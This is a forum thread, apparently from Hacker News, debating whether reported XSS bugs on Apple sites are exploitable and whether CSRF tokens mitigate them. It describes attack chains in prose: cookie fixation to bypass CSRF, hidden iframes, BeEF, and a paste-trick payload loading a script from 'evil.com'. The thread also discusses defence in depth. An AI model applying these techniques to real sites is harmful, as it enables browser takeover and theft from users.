"Compared to other companies Apple has a lot of deprecated (?) legacy applications running. It looks like a mingle-mangle of different programming languages, application servers, domains or hostnames and independently running services - with a lot of bugs."
Nearly every large corporation is similar in this regard.
Apple definitely credits vulnerability reporters appropriately, which is a good thing. However, I don't think that's the issue here. I think the point is that they leave a lot to be desired in terms of communication, response times, and time to patch.
Since he doesn't show the full URL in most of the images it's not possible to say for sure, but many of them appear to be a later stage in a multi-step process (registration, verifying email) to which you couldn't direct someone you wished to exploit.
If you have to enter bogus form input and make it to step 3, then while it technically is still XSS, it's not useful as an attack vector.
The others where an arbitrary user can be exploited by following a simple link (think I saw 2-3 of these) are real. CSRF protection won't help you there, since once I have JS running on your page I can insert iFrames or use XMLHTTP and read the CSRF tokens myself.
Each of the screen shots shows the XSS vulnerability in action. IE: all of the alert/confirm pop-ups you see on the screenshot are not supposed to be there, they've been injected through an XSS vulnerability.
The assumption is if you can cause an alert to display, you can (probably) run AJAX requests and actually get some data/do some damage.
If the arbitrary JS is specified by a specially crafted URL or form POST, you can make the JS execute in someone else's browser as easily as getting someone to click on a very innocent-looking link.
And as soon as you can get someone to execute arbitrary JS on a particular domain, any CSRF protection will be useless because you practically control their browser. (You can even literally control their browser, if you use BeEF http://www.bindshell.net/tools/beef.html )
You can even completely hide the XSS happening by loading it into an invisible IFRAME, while the main page keeps the victim's attention occupied by playing the promised video of a cute kitten playing with a ball of string.
This should work: http://mkjon.es/xss.html (note that your server seems to hang if I put "<script>" in the GET params, but assuming that works and thus the page is vulnerable to XSS like you intended, then this works). Just pretend the <img /> tag is a script tag.
Of course, this is kind of cheating - I exploit the fact that there's a CSRF bug on your web site. But that's kind of the point - just saying "oh well this is an XSS but it doesn't matter because this other unrelated thing prevents it" is bad security. It's entirely possible, even likely, that someone will come along at a later date and change that other seemingly-unrelated thing, having no idea that they're introducing a security hole in the process.
Cool! I'll look into the CSRF bug. EDIT: Using a vulnerability in another demo page definitely is cheating. But I do like the hack.
To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.
EDIT 2: There was another demo on my server that let you set arbitrary cookies. This exploit relied on setting the JSESSIONID cookie. If a similar exploit existed on Apple's web site, presumably this would defeat the purpose of the exploit, since the target user would no longer be authenticated as him/herself. I changed the cookie demo not to allow arbitrary cookie names, just to prevent it interfering with other demos.
> To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.
True, they may require some clever hacking to really exploit.
But experience has shown me that (way) more often than not, even though an XSS might not be directly exploitable, there will be further (perhaps not so critical) security problems that will lead to an exploit, given an at-first-sight-not-so-exploitable XSS.
So it's always a better idea to make sure the XSS is not there in the first place, because if someone figures out a way to leverage it, they'll have full control over a visitor's browser on that domain.
Maybe the innocent flaw that allows the exploit isn't even there yet at first, but gets added accidentally with later development. It's still the XSS that is the most critical problem.
Sorry, didn't mean to put words in your mouth. I just wanted to point out that even when it seems like an XSS doesn't demonstrate a vulnerability, some of your assumptions may be wrong and it actually does.
Oh, sorry. Basically he had another endpoint that let you set an arbitrary cookie to an arbitrary value (with no csrf protection).
So first I had it hit that endpoint, setting the JSESSIONID cookie to my value (off of which the csrf token is keyed). Then I had it redirect to an xss'd page with my csrf token, which it would see as valid because it matched the (forced) JSESSIONID.
It however would be odd for GET requests to contain anti-CSRF token. In such case, users cannot pass any links that have any parameters and the session-specific token to others. This seems completely defeat the purpose of GET requests.
Ooh, that's a good one. When I said that, I wasn't thinking about the CSRF token being required with the XSS-able form. So yeah, that partially mitigates the problem.
It can still be done, however. But it'll take more than a few minutes, because I have only read about and played with PoCs of the relevant attacks, never implemented one like that myself.
Now this only works because your form submits the CSRF token via a GET request, so I can read it from the URL. If your form would only accept a POST request, I'm not entirely sure of how I'd do it. I need to think about that for a little while longer, it's an interesting challenge, though. There are some (IMO) far-fetched clickjacking-like attacks that require some social engineering (of the containing page) to get the user to perform certain actions that could do it. One way is to wrap a viewsource: URL to your page in an IFRAME (only works in Firefox, afaik) and position and dress it up so that only the CSRF token is visible and it looks like a CAPTCHA. The user would enter the CAPTCHA/CSRF and then XSS is possible. But that's not very elegant, and I'm not entirely sure if Firefox still allows doing this. Also it's not guaranteed to succeed if the user can't be bothered to enter a CAPTCHA to see the cute kitten video.
So in that case I'm not sure. One surefire way to prevent these and related clickjacking-style attacks is to put some framebusting JS code in your site. Twitter does this to prevent clickjacking to autosubmit a those pre-filled tweet form. Check their sourcecode, the way they do it is pretty thorough (even taking into account race conditions that might cause the submit click to go through just before the frame is busted).
I'm going to have to think about this for a while (how to do it if it were a POST form, that is. I'm fairly sure I could get the GET variant to work easily--I hope you could follow that example). The way you put a CSRF token in that form definitely makes it non-trivial, though.
(BTW for anyone else to attempt a shot at this: the CSRF token is not actually the same value every time, but random generated and fixed with the session cookie, so clear your cookies before you try your brilliant exploit)
I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.
However, a variant of the later attack you describe would work. You could get the user to click on a flash app on your page, which copies <script src="http://evil.com/script.js /> to your clipboard, then "click on the box below and press ctrl-v, then enter.". The box below would of course be the one on the XSSable page, and when the user hit enter, it would submit the form and load up the second page, XSSing the user.
This sounds far-fetched, but I've seen successful attacks like this in the wild.
> I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.
Ok--I wondered about that. But I figured BeEF has that capability so it must be possible somehow. At least, as far as I understand BeEF loads the page in a fullscreen IFRAME controlling the browser from the containing page. Guess I was wrong.
No other way to pull it off? Cause the token is right there in the URL, it's gotta be leaked somewhere ... :-)
If I didn't know that, my original post would have said that all the Apple pages would be invulnerable if they prevented CSRF. I think the expresslane page is one where data could go in the database and others could see it.
CSRF is not a prereq in general, but it is a prereq for the attacks tripzilch listed.
It might sound trivial, but on many systems it can lead to serious privilege escalation and expose huge vulnerabilities further up in the chain. Check out the case study below for an example in real world.
Not necessarily. Typical CSRF implementations prevent the server from accepting inputs coming from an "unauthorized" page. This might or might not prevent XSS from being triggered on the client side.
XSS can propagate to other users via database rather than HTTP requests.
In general, you should prevent attacks in one-by-one manner. Hoping that one security mechanism will accidentally fix other issues will result in design that is insecure, convoluted and hard to reason about. Remember: you have to prevent all attacks. Attackers only need to find one vulnerability to attack. Therefore, any kind of complexity in design works to their advantage.
Exactly, defense in depth is the name of the game.
An example of a defense in depth strategy:
Layer 1: Customer runs a WAF (web app firewall) to do some CSRF and XSS mitigation
Layer 2: App contains its own intrusion detection system that preprocesses all requests for "typical" SQL injection, CSRF and XSS attacks and prevents the rest of the code from executing if this is the case. I'm using PHP-IDS for this.
Layer 3: every request to the server must submit an anti-CSRF token and is immediately refused if it does not do so.
Layer 4: Business logic contains its own positive input validation (all input must be in the expected format), and prevents the rest of the code from executing if the input is not valid. This is meant to prevent XSS and SQL injection when data enters the system.
Layer 5: all DB requests use parameters instead of concatenating variables into queries to mitigate the risk of SQL injection.
Layer 6: All output is encoded to prevent XSS attacks when data leaves the system.
In such a solution you can have a security issue in one of the layers and still have a system that is secure.
Exactly. Don't defend from XSS by implementing CSRF defences. Defend from XSS by making sure you properly encode every piece of data that enters your web page. Then add CSRF on top, to prevent third party sites from initiating "clicks" on your page. Then implement Content-Security-Policy to help defend against programmer mistakes which leave CSRF/XSS holes open.
I agree that XSS can propagate to other users via database...I'm pretty sure the expresslane example is a real vulnerability for that reason. But note that the grandparent post was not describing an attack via the database.
I am not hoping that CSRF prevention will make everything OK on the Apple website (which I have no affiliation with, by the way). Nor am I saying XSS prevention is not worthwhile. I'm merely pointing out that this blog post is not demonstrating 11 vulnerabilities in Apple's web site. There might actually be 11 vulnerabilities, but the blog post doesn't give enough information for us to know.
You're right about the search example. That doubles the list of demonstrated vulnerabilities in this article from 1 to 2.
I certainly agree that using GET for changing server state would be wrong. I don't know if any of the examples in the article work that way, since all we're provided with is a screenshot with an alert box. That's demonstrated sloppiness on Apple's web site, but not enough information to demonstrate vulnerability.
(I'm definitely voting up your reply for intelligent discussion.)
These screenshots show pretty textbook reflected XSS vulnerabilities, so I don't see why you think there's a CSRF vulnerability required for an exploit. Most of the targets are innocuous operations that aren't modifying any persistent state, so they wouldn't normally have CSRF protection. In particular, the search queries all appear to support direct-linking (notice the query string), which means they can't employ CSRF mitigations (because it would break the links).
Yes, the search query string is one where CSRF prevention would be out of place. Most of them, though, are intermediate results in a user-specific interaction where CSRF prevention wouldn't break anything. There are a lot of web frameworks out there; some of them likely do CSRF prevention by default. From this article we can definitely conclude that Apple web sites are sloppy in 11 places, but there's not enough information to say there are 11 vulnerabilities.
I'm getting the impression you don't entirely understand how CSRF exploits and mitigations work. Things like CSRF cookies are intended to protect persistent state at the server. I don't think I've ever seen CSRF mitigations used to gate response output. And to be honest, it doesn't sound like a good strategy because it wouldn't necessarily protect the target from exploit. You're still likely to have other vectors of bypassing a CSRF protection used in such a manner.
Your impression is entirely mistaken. I do entirely understand CSRF exploits and mitigations. I think what's happening is that when I write "not a demonstrated vulnerability" you (and others) are reading "a fine and dandy example of web programming". That's why phrases like "doesn't sound like a good strategy" keep popping up in your reply and others when I'm not talking about recommended strategy.
When I wrote my first comment, this story was at the top of the front page. A story about 10 demonstrated vulnerabilities on Apple's web sites would belong there. A story about 2 demonstrated vulnerabilities and 8 instances of sloppiness that might be vulnerabilities but we don't know without more information -- that's not really a top-of-the-front-page story.
You're arguing the existence of a mitigation strategy that's extremely unlikely and not at all evidenced by the information available. So, it's not that I (or anyone else as far as I can tell) took your statements as more than they are. It's just that your basic premise is highly questionable at best. It's not strictly impossible, but it is based on extraordinary assumptions lacking any extraordinary evidence to support them.
(come on people, what's with all the downvotes? this is an interesting discussion! maybe the premise is incorrect but the answers are super informative)
Hey brlewis, even though we haven't managed to (completely/reliably) crack your CSRF example YET ... I hope you agree that it's better to not have an XSS in the first place rather than rely on CSRF to make it (way) more difficult, right?